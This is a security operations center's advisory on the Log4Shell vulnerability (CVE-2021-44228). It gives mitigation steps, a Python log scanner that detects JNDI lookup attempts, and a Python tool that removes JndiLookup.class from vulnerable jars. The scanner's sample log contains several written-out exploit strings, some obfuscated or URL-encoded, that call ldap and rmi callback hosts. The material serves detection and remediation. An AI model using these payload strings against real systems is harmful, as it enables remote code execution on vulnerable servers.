SOC ADVISORY - Critical Apache Log4j Vulnerability
Incident Report for CyFlare
Resolved
This incident has been resolved.
Posted Mar 01, 2022 - 09:57 EST
Monitoring
Dear Subscriber,

Yesterday, 12/10/2021, a critical zero-day vulnerability in Apache Log4j (CVE-2021-44228), a widely used Java logging library, was publicly disclosed. It is already being exploited in the wild; so far, fortunately, primarily to deliver coin miners.

The SOC is fully engaged: building a comprehensive threat advisory and threat hunting queries, and working with several clients in whose environments related exploitation attempts have been observed.

We will continue to hunt for related Indicators of Compromise across client environments and to scan for the vulnerability within clients who subscribe to our Vulnerability Management Service.

We can confirm that the Stellar Cyber BDS platform's IDS engine has been updated with new IDS signatures that trigger security detections on exploitation attempts observed in network traffic.

In addition, the CyFlare SOC has built its own threat hunting queries and a custom alarm (ATH) rule that triggers a security detection on exploitation attempts. The rule has been enabled and is operational.
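As an added example (not CyFlare's ATH rule or a Stellar Cyber IDS signature), the Python below shows the detection logic such a rule needs: it URL-decodes each access-log line, unwraps the nested Log4j lookups attackers use to hide the "jndi" and "ldap" tokens (${lower:j}, ${::-j}, ${env:NOPE:-j}), and only then matches ${jndi:...}, extracting the callback scheme, host and port. The log lines in SAMPLE_LOG are constructed for this example and use TEST-NET addresses.

```python
"""Detect Log4Shell (CVE-2021-44228) exploitation attempts in HTTP access-log lines.

Added example, not CyFlare's ATH rule or a Stellar Cyber IDS signature. The lines in
SAMPLE_LOG are constructed for illustration (TEST-NET addresses, no real hosts).
"""
import re
import urllib.parse
from typing import List, Optional

# Log4j lookup syntax lets an attacker hide the literal "jndi"/"ldap" tokens:
#   ${lower:j} / ${upper:N}   -> case-conversion lookup of a single character
#   ${::-j} / ${env:NOPE:-j}  -> lookup with an empty/unknown key that falls back to "j"
# Unwrapping these repeatedly reduces the obfuscated form back to ${jndi:ldap://...}.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}])\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")

# What remains after normalisation: ${jndi:<scheme>:<host>[:<port>]...
_JNDI = re.compile(r"\$\{jndi:([a-z]+):/*([^/}:\s]+)(?::(\d+))?")


def normalize(text: str, max_rounds: int = 8) -> str:
    """URL-decode (attackers double-encode) and unwrap nested lookups until stable."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        unwrapped = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        unwrapped = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), unwrapped)
        if unwrapped == text:
            break
        text = unwrapped
    return text.lower()


def scan_line(line: str) -> Optional[dict]:
    """Return details of a JNDI lookup attempt found in the line, or None if clean."""
    match = _JNDI.search(normalize(line))
    if not match:
        return None
    scheme, host, port = match.groups()
    return {
        "scheme": scheme,
        "host": host,
        "port": int(port) if port else None,
        # True when the raw line had to be decoded/unwrapped to reveal "${jndi:"
        "obfuscated": "${jndi:" not in line.lower(),
    }


def scan_log(lines: List[str]) -> List[dict]:
    """Run scan_line over every line; each hit carries its zero-based line index."""
    hits = []
    for index, line in enumerate(lines):
        finding = scan_line(line)
        if finding:
            hits.append({"line": index, **finding})
    return hits


# Constructed sample access log: plain, case-lookup obfuscated, URL-encoded,
# a benign line that merely contains the word "jndi", and default-lookup obfuscated.
SAMPLE_LOG = [
    '203.0.113.10 - - [11/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${jndi:ldap://203.0.113.10:1389/a}"',
    '198.51.100.7 - - [11/Dec/2021:03:15:22 +0000] "GET /login HTTP/1.1" 200 1043 "-" '
    '"${${lower:j}${upper:n}${lower:d}${lower:i}:${lower:l}dap://203.0.113.10:1389/x}"',
    '198.51.100.7 - - [11/Dec/2021:03:16:01 +0000] '
    '"GET /?q=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.7%3A1099%2Fobj%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '192.0.2.44 - - [11/Dec/2021:03:16:40 +0000] "GET /docs/jndi-howto.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.45 - - [11/Dec/2021:03:17:02 +0000] '
    '"GET /?id=${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.10/c} HTTP/1.1" '
    '200 0 "-" "python-requests/2.26"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The normalisation step is the part worth copying into a real rule: a signature that matches only the literal string `${jndi:` misses the obfuscated and URL-encoded forms, which were in use within hours of disclosure. The extracted host and port are the outbound-connection indicators to hunt for in firewall and DNS logs.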

Customers running applications that use Apache Log4j should upgrade to the latest fixed version immediately (see the Apache Log4j security page in the references below).

Since the original patch was found to be incomplete and bypassable (tracked as CVE-2021-45046), in the interest of layering as many protections against this vulnerability as possible, the following mitigations are also recommended:
• Block unexpected outbound connections from affected servers at the firewall (e.g., PANW), in particular LDAP and RMI. The exploit requires the vulnerable host to connect out to an attacker-controlled directory server, and attacker callback servers listen on arbitrary ports, so restrict by destination and application rather than only by the default ports 389/636 and 1099.
• Disable the JNDI lookup:
o Remove the JndiLookup class (org/apache/logging/log4j/core/lookup/JndiLookup.class) from the log4j-core jar and restart the service.
o For Spring applications, set spring.jndi.ignore=true. This disables Spring's own JNDI lookups and is defense in depth only; it does not remove Log4j's JndiLookup.
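
The JndiLookup removal above, as an added example that is not CyFlare's procedure or Apache's tooling: the Python below walks a directory tree, identifies log4j-core jars from their embedded Maven pom.properties, reports the version and whether JndiLookup.class is present, and rewrites vulnerable jars without that entry (the same effect as the Apache-recommended `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`). The jars it creates in demo() are constructed fixtures with placeholder class bytes, not real Log4j releases. Two caveats a practitioner should keep in mind: the class still exists in fixed releases (2.16.0 and later simply disable JNDI by default), so its presence alone does not mean a jar is vulnerable, and removing it breaks any legitimate JNDI lookups a Log4j configuration may use; the log4j2.formatMsgNoLookups setting is only available from 2.10 and does not cover CVE-2021-45046, which is why the class removal is preferred when upgrading is not immediately possible.

```python
"""Find log4j-core jars, report version and JndiLookup.class presence, and strip the
class from vulnerable jars. Added example, not CyFlare's procedure or Apache tooling.
The jars built by make_sample_jar() are constructed fixtures, not real Log4j releases."""
import os
import re
import tempfile
import zipfile
from typing import List, Optional

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def log4j_core_version(jar_path: str) -> Optional[str]:
    """Version from the jar's Maven pom.properties; None if it is not log4j-core
    (shaded/fat jars that drop that file are a known blind spot of this check)."""
    try:
        with zipfile.ZipFile(jar_path) as zf:
            if POM_PROPERTIES not in zf.namelist():
                return None
            for raw in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
                key, sep, value = raw.partition("=")
                if sep and key.strip() == "version":
                    return value.strip()
    except zipfile.BadZipFile:
        return None
    return None


def has_jndi_lookup(jar_path: str) -> bool:
    with zipfile.ZipFile(jar_path) as zf:
        return JNDI_LOOKUP_CLASS in zf.namelist()


def vulnerable_to_cve_2021_44228(version: str) -> bool:
    """Fixed releases per the Apache Log4j security page: 2.16.0 (Java 8+), 2.12.2
    (Java 7) and 2.3.1 (Java 6). Every other 2.x release is affected; 1.x is out of scope."""
    nums = [int(n) for n in re.findall(r"\d+", version)]
    major, minor, patch = (nums + [0, 0, 0])[:3]
    if major != 2 or minor >= 16:
        return False
    if minor == 12 and patch >= 2:
        return False
    if minor == 3 and patch >= 1:
        return False
    return True


def strip_jndi_lookup(jar_path: str) -> bool:
    """Rewrite the jar without JndiLookup.class. Writes a temp file and atomically
    replaces the original so an interrupted run never leaves a truncated jar."""
    if not has_jndi_lookup(jar_path):
        return False
    tmp_path = jar_path + ".tmp"
    with zipfile.ZipFile(jar_path) as src, zipfile.ZipFile(tmp_path, "w") as dst:
        for info in src.infolist():          # entry order (MANIFEST first) is preserved
            if info.filename != JNDI_LOOKUP_CLASS:
                dst.writestr(info, src.read(info.filename))
    os.replace(tmp_path, jar_path)
    return True


def scan_tree(root: str) -> List[dict]:
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            version = log4j_core_version(path) if name.endswith(".jar") else None
            if version is None:
                continue
            findings.append({
                "path": os.path.relpath(path, root).replace(os.sep, "/"),
                "version": version,
                "jndi_lookup_present": has_jndi_lookup(path),
                "vulnerable": vulnerable_to_cve_2021_44228(version),
            })
    return sorted(findings, key=lambda f: f["path"])


def mitigate_tree(root: str) -> List[str]:
    """Strip JndiLookup.class from every vulnerable log4j-core jar; return changed paths."""
    changed = []
    for f in scan_tree(root):
        if f["vulnerable"] and strip_jndi_lookup(os.path.join(root, f["path"])):
            changed.append(f["path"])
    return changed


def make_sample_jar(path: str, version: str, with_jndi_lookup: bool = True) -> None:
    """CONSTRUCTED fixture: pom.properties plus placeholder class entries (not bytecode)."""
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr(POM_PROPERTIES, "groupId=org.apache.logging.log4j\n"
                    "artifactId=log4j-core\nversion=%s\n" % version)
        zf.writestr("org/apache/logging/log4j/core/lookup/StrLookup.class", b"\xca\xfe\xba\xbe")
        if with_jndi_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")


def demo() -> dict:
    """Build three constructed jars in a temp dir, scan, mitigate, and rescan."""
    root = tempfile.mkdtemp(prefix="log4j-")
    make_sample_jar(os.path.join(root, "app", "WEB-INF", "lib", "log4j-core-2.14.1.jar"), "2.14.1")
    make_sample_jar(os.path.join(root, "svc", "lib", "log4j-core-2.12.2.jar"), "2.12.2")
    make_sample_jar(os.path.join(root, "svc", "lib", "log4j-core-2.17.1.jar"), "2.17.1")
    before = scan_tree(root)
    changed = mitigate_tree(root)
    return {"before": before, "changed": changed, "after": scan_tree(root)}


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

In the demo, only the 2.14.1 jar is modified: 2.12.2 and 2.17.1 still carry JndiLookup.class but are fixed releases, and touching them would gain nothing. Run this kind of scan on the hosts the Vulnerability Management Service cannot reach from the network, and restart each affected service afterwards, since a running JVM keeps the already-loaded class.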

Reference Links:
https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/
https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html
https://logging.apache.org/log4j/2.x/security.html
https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/
https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/apache-releases-log4j-version-2150-address-critical-rce
https://www.sentinelone.com/blog/cve-2021-44228-staying-secure-apache-log4j-vulnerability/

Should you have any questions or concerns, please place a ticket with the SOC using socir@cyflare.com or call 877.729.3527 extension 2.

Thank you,
Your CyFlare SOC
Posted Dec 11, 2021 - 16:49 EST
This incident affected: Breach Detection Service.